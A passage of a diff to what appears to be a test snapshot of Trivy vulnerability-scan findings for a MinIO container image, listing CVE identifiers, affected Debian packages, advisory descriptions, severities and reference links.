"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libmount1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { @@ -65273,7 +65695,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-29458", "installedVersion": "6.2+20201114-2", - "packageName": "libtinfo6", + "packageName": "libncurses6", "references": [ "http://seclists.org/fulldisclosure/2022/Oct/41", "https://access.redhat.com/security/cve/CVE-2022-29458", @@ -65356,7 +65778,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-29491", "installedVersion": "6.2+20201114-2", - "packageName": "libtinfo6", + "packageName": "libncurses6", "references": [ "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", "http://www.openwall.com/lists/oss-security/2023/04/19/10", @@ -65435,614 +65857,470 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": "6.2+20201114-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libncursesw6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "10.36-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "10.36-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libuuid1", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - }, - { - "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "buffer overrun in util.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - 